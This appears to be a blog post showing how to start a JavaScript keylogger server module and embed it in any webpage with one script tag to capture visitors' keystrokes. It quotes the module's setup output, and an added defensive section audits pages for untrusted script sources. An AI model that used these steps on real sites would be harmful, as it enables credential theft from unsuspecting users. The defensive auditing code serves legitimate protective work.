Rarely does a week go by without a friend or family member getting their login credentials compromised, then reused for malicious purposes. My wife is always on the lookout on Facebook, warning relatives and friends to change their passwords. Many people don’t understand how their credentials get compromised. Password reuse across several websites is usually the culprit. Password reuse is a problem even if the website encrypts the passwords in its databases. An attacker only needs to insert some evil code and allow it to do the work for them.
This is one of the many reasons the Internet is like a field of mines, where malicious code is around every turn. If an attacker can insert code on a website, they don’t need to crack any passwords. Keyloggers can be included on most websites with one line of code. The activity that ensues is pretty awesome from an attacker’s perspective: they can sit back and watch credentials magically appear. It reminds me of the fishermen’s tales of fish jumping into their boats.
Step 1: Module setup:
```
demo => true

Name        Current Setting  Required  Description
----        ---------------  --------  -----------
DEMO        true             yes       Creates HTML for demo purposes
SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT     8080             yes       The local port to listen on.
SSL         false            no        Negotiate SSL for incoming connections
SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH                      no        The URI to use for this exploit (default is random)

[*] Using URL: http://0.0.0.0:8080/qZBRzd
[*] Local IP: http://192.168.1.131:8080/qZBRzd
[*] Server started.
```
Step 2: Demo page URL
Step 3 (Optional): To embed the keylogger into any webpage, use an HTML <script> tag with a reachable URL appended with “/[whatever].js”.
Screen Capture 1: Module setup and run
Screen Capture 2: Demo page
Screen Capture 3: Keystrokes captured and stored to loot
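On the defending side, the one-line injection described above can be caught by auditing which scripts a page actually loads. The following is an added example, not part of the original post or of the module: it flags `<script>` tags whose source is outside an allowlist of trusted origins. The page URL, allowlist and sample HTML are constructed; only the 192.168.1.131:8080 address is taken from the module output above, with `x.js` standing in for the arbitrary `.js` name.

```python
# Added defensive example: flag <script> tags loaded from untrusted origins.
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class ScriptCollector(HTMLParser):
    """Collect the attributes of every <script> tag that has a src."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        attr = dict(attrs)
        if tag == "script" and attr.get("src"):
            self.scripts.append(attr)


def origin(url):
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}".lower()


def audit_scripts(html, page_url, trusted_origins):
    """Return (resolved_src, reasons) for each script that needs review."""
    collector = ScriptCollector()
    collector.feed(html)
    trusted = {o.lower() for o in trusted_origins} | {origin(page_url)}
    findings = []
    for attr in collector.scripts:
        src = urljoin(page_url, attr["src"].strip())  # handles relative and //host
        reasons = []
        if origin(src) not in trusted:
            reasons.append("untrusted origin")
            if not attr.get("integrity"):
                reasons.append("no SRI hash")
        if page_url.startswith("https://") and src.startswith("http://"):
            reasons.append("plain HTTP on HTTPS page")
        if reasons:
            findings.append((src, reasons))
    return findings


# Constructed sample page; the last tag stands in for an injected one-liner.
SAMPLE_HTML = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example.com/lib.js" integrity="sha384-CONSTRUCTED"></script>
<script src="http://192.168.1.131:8080/qZBRzd/x.js"></script>
</head><body><form><input name="user"></form></body></html>"""
```

Calling `audit_scripts(SAMPLE_HTML, "https://shop.example.com/login", ["https://cdn.example.com"])` reports only the third tag. The same allowlist is what a `script-src` Content-Security-Policy would enforce in the browser.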
As always, hack responsibly. Let me know in the comments if you have any questions.